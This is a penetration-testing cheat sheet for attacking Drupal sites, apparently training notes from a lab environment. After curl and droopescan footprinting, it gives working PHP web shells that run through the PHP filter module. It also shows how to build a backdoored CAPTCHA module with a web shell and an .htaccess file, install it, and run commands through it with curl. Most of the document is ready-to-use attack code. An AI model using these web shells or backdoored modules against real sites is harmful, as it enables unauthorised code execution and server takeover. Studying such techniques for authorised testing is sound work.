Drupal

Footprinting and Enumeration

# Confirming site is running Drupal
curl -s <http://drupalsite.local> | grep Drupal

# Find Version 
curl -s <http://drupalsite.local/CHANGELOG.txt> | grep -m2 ""

Droopscan

# Normal scan with droopscan
droopescan scan drupal -u <http://drupalsite.local>

Attacking Drupal

Code Execution

# FOR UPTO VERSION 8, from version 8 onwards, php filter module is not installed by default, We can install PHP filter module ourselves 
# We can get code execution by writing php web shell into php filter module 
# md5 Encoded parameter for cmd in php web shell
<?php
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);
?>

# Executing commands using curl
curl -s <http://drupalsite.local/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id> | grep uid | cut -f4 -d">"

Uploading a Backdoored Module

# Download any module from drupal site like CAPTCHA 
wget --no-check-certificate  <https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz>
tar xvf captcha-8.x-1.2.tar.gz

# Create a PHP web shell with the contents:
<?php
system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);
?>

# Next, we need to create a .htaccess file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the /modules folder.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

# Copy both of these files to the captcha folder and create an archive.
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/

# Install the module on page : <http://drupal.inlanefreight.local/admin/modules/install>
# After successful installation, , browse to /modules/captcha/shell.php to execute commands.

curl -s drupalsite.local/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id